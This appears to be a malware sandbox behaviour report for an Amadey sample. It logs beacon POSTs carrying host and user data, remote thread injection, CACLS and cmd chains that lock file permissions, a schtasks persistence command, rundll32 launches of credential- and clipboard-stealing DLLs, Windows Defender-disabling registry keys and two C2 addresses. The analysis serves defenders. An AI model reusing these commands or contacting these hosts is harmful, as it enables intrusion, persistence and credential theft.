HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Nov. 3, 2023, 6:10 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1

Resumed a suspended thread in a remote process potentially indicative of process injection (14 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3664 resumed a thread in remote process 3708
Process injection	Process 3768 resumed a thread in remote process 3856
Process injection	Process 4092 resumed a thread in remote process 3124
Process injection	Process 3432 resumed a thread in remote process 2964
Process injection	Process 3544 resumed a thread in remote process 552
Process injection	Process 3544 resumed a thread in remote process 1772
Process injection	Process 3544 resumed a thread in remote process 948
NtResumeThread Nov. 3, 2023, 6:10 p.m.	thread_handle: 0x00000114 suspend_count: 1 process_identifier: 3708	1	0	0
NtResumeThread Nov. 3, 2023, 6:10 p.m.	thread_handle: 0x00000114 suspend_count: 1 process_identifier: 3856	1	0	0
NtResumeThread Nov. 3, 2023, 6:10 p.m.	thread_handle: 0x00000114 suspend_count: 1 process_identifier: 3124	1	0	0
NtResumeThread Nov. 3, 2023, 6:10 p.m.	thread_handle: 0x00000254 suspend_count: 1 process_identifier: 2964	1	0	0
NtResumeThread Nov. 3, 2023, 6:11 p.m.	thread_handle: 0x0000038c suspend_count: 1 process_identifier: 552	1	0	0
NtResumeThread Nov. 3, 2023, 6:11 p.m.	thread_handle: 0x00000544 suspend_count: 1 process_identifier: 1772	1	0	0
NtResumeThread Nov. 3, 2023, 6:11 p.m.	thread_handle: 0x00000600 suspend_count: 1 process_identifier: 948	1	0	0

Uses suspicious command line tools or Windows utilities (16 events)

cmdline	CACLS "..\fefffe8cea" /P "test22:R" /E
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\e8b5234212" /P "test22:N"&&CACLS "..\e8b5234212" /P "test22:R" /E&&Exit
cmdline	CACLS "..\ea7c8244c8" /P "test22:N"
cmdline	cmd /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline	CACLS "..\e8b5234212" /P "test22:R" /E
cmdline	cmd /k echo Y\|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y\|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
cmdline	CACLS "Utsysc.exe" /P "test22:R" /E
cmdline	cmd /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\e8b5234212" /P "test22:N"&&CACLS "..\e8b5234212" /P "test22:R" /E&&Exit
cmdline	CACLS "..\e8b5234212" /P "test22:N"
cmdline	CACLS "Utsysc.exe" /P "test22:N"
cmdline	CACLS "explothe.exe" /P "test22:N"
cmdline	CACLS "..\ea7c8244c8" /P "test22:R" /E
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline	CACLS "..\fefffe8cea" /P "test22:N"
cmdline	CACLS "explothe.exe" /P "test22:R" /E
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y\|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

Executed a process and injected code into it, probably while unpacking (50 out of 316 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Nov. 3, 2023, 6:09 p.m.	thread_identifier: 2684 thread_handle: 0x0000031c process_identifier: 2680 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000324	1	1
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x0000022c suspend_count: 1 process_identifier: 2680	1	0
CreateProcessInternalW Nov. 3, 2023, 6:09 p.m.	thread_identifier: 2776 thread_handle: 0x00000250 process_identifier: 2772 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000258	1	1
CreateProcessInternalW Nov. 3, 2023, 6:09 p.m.	thread_identifier: 2840 thread_handle: 0x00000250 process_identifier: 2836 current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\e8b5234212" /P "test22:N"&&CACLS "..\e8b5234212" /P "test22:R" /E&&Exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000260	1	1
CreateProcessInternalW Nov. 3, 2023, 6:09 p.m.	thread_identifier: 2220 thread_handle: 0x00000388 process_identifier: 2200 current_directory: C:\Users\test22\AppData\Local\Temp\ filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000006001\1.exe" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x0000038c	1	1
CreateProcessInternalW Nov. 3, 2023, 6:09 p.m.	thread_identifier: 2476 thread_handle: 0x000003d8 process_identifier: 2472 current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212 filepath: C:\Windows\System32\rundll32.exe track: 1 command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\aca439ae61e801\cred64.dll, Main filepath_r: C:\Windows\System32\rundll32.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003ec	1	1
CreateProcessInternalW Nov. 3, 2023, 6:09 p.m.	thread_identifier: 2596 thread_handle: 0x000003d0 process_identifier: 2592 current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212 filepath: C:\Windows\System32\rundll32.exe track: 1 command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\aca439ae61e801\clip64.dll, Main filepath_r: C:\Windows\System32\rundll32.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003f4	1	1
CreateProcessInternalW Nov. 3, 2023, 6:10 p.m.	thread_identifier: 2744 thread_handle: 0x00000394 process_identifier: 2752 current_directory: C:\Users\test22\AppData\Local\Temp\ filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000008001\abd.exe" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x00000390	1	1
CreateProcessInternalW Nov. 3, 2023, 6:10 p.m.	thread_identifier: 1108 thread_handle: 0x00000364 process_identifier: 1996 current_directory: C:\Users\test22\AppData\Local\Temp\ filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000009001\trafico.exe" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x000003c0	1	1
CreateProcessInternalW Nov. 3, 2023, 6:10 p.m.	thread_identifier: 1096 thread_handle: 0x000003a8 process_identifier: 1520 current_directory: C:\Users\test22\AppData\Local\Temp\ filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000020001\TEST32.exe" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x000003e0	1	1
CreateProcessInternalW Nov. 3, 2023, 6:10 p.m.	thread_identifier: 1504 thread_handle: 0x0000039c process_identifier: 1456 current_directory: C:\Users\test22\AppData\Local\Temp\ filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000024001\build2.exe" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x000003ac	1	1
CreateProcessInternalW Nov. 3, 2023, 6:10 p.m.	thread_identifier: 2856 thread_handle: 0x000003c8 process_identifier: 1792 current_directory: C:\Users\test22\AppData\Local\Temp\ filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000027001\TEST32.exe" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x000003e0	1	1
CreateProcessInternalW Nov. 3, 2023, 6:10 p.m.	thread_identifier: 3380 thread_handle: 0x000003d0 process_identifier: 3376 current_directory: C:\Users\test22\AppData\Local\Temp\ filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000029001\lom30.exe" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x00000274	1	1
CreateProcessInternalW Nov. 3, 2023, 6:09 p.m.	thread_identifier: 2916 thread_handle: 0x0000008c process_identifier: 2912 current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW Nov. 3, 2023, 6:09 p.m.	thread_identifier: 2956 thread_handle: 0x00000088 process_identifier: 2952 current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "Utsysc.exe" /P "test22:N" filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW Nov. 3, 2023, 6:09 p.m.	thread_identifier: 3008 thread_handle: 0x0000008c process_identifier: 3004 current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "Utsysc.exe" /P "test22:R" /E filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW Nov. 3, 2023, 6:09 p.m.	thread_identifier: 3056 thread_handle: 0x0000008c process_identifier: 3052 current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
CreateProcessInternalW Nov. 3, 2023, 6:09 p.m.	thread_identifier: 812 thread_handle: 0x00000094 process_identifier: 604 current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "..\e8b5234212" /P "test22:N" filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW Nov. 3, 2023, 6:09 p.m.	thread_identifier: 2104 thread_handle: 0x0000008c process_identifier: 2124 current_directory: C:\Users\test22\AppData\Local\Temp\e8b5234212 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "..\e8b5234212" /P "test22:R" /E filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x000000a0 suspend_count: 1 process_identifier: 2952	1	0
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x0000009c suspend_count: 1 process_identifier: 3004	1	0
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x000000a0 suspend_count: 1 process_identifier: 604	1	0
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x00000098 suspend_count: 1 process_identifier: 2124	1	0
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x000000f4 suspend_count: 1 process_identifier: 2200	1	0
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x0000016c suspend_count: 1 process_identifier: 2200	1	0
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x000001a8 suspend_count: 1 process_identifier: 2200	1	0
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x00000228 suspend_count: 1 process_identifier: 2200	1	0
NtGetContextThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x00000100	1	0
NtGetContextThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x00000100	1	0
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x00000100 suspend_count: 1 process_identifier: 2200	1	0
NtGetContextThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x00000100	1	0
NtGetContextThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x00000100	1	0
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x00000100 suspend_count: 1 process_identifier: 2200	1	0
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x0000031c suspend_count: 1 process_identifier: 2200	1	0
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x00000354 suspend_count: 1 process_identifier: 2200	1	0
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x00000410 suspend_count: 1 process_identifier: 2200	1	0
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x000002c0 suspend_count: 1 process_identifier: 2200	1	0
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x00000264 suspend_count: 1 process_identifier: 2200	1	0
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x00000344 suspend_count: 1 process_identifier: 2200	1	0
NtGetContextThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x00000100	1	0
NtGetContextThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x00000100	1	0
NtResumeThread Nov. 3, 2023, 6:09 p.m.	thread_handle: 0x00000100 suspend_count: 1 process_identifier: 2200	1	0
NtResumeThread Nov. 3, 2023, 6:10 p.m.	thread_handle: 0x00000228 suspend_count: 1 process_identifier: 2200	1	0
NtResumeThread Nov. 3, 2023, 6:10 p.m.	thread_handle: 0x000003e8 suspend_count: 1 process_identifier: 2200	1	0
NtResumeThread Nov. 3, 2023, 6:10 p.m.	thread_handle: 0x0000041c suspend_count: 1 process_identifier: 2200	1	0
NtResumeThread Nov. 3, 2023, 6:10 p.m.	thread_handle: 0x00000288 suspend_count: 1 process_identifier: 2200	1	0
NtResumeThread Nov. 3, 2023, 6:10 p.m.	thread_handle: 0x000003bc suspend_count: 1 process_identifier: 2200	1	0
NtResumeThread Nov. 3, 2023, 6:10 p.m.	thread_handle: 0x00000348 suspend_count: 1 process_identifier: 2200	1	0
NtResumeThread Nov. 3, 2023, 6:10 p.m.	thread_handle: 0x0000034c suspend_count: 1 process_identifier: 2200	1	0
NtResumeThread Nov. 3, 2023, 6:10 p.m.	thread_handle: 0x00000448 suspend_count: 1 process_identifier: 2200	1	0

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 events)

dead_host	85.209.176.171:80
dead_host	149.40.62.171:15666

Amadey.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All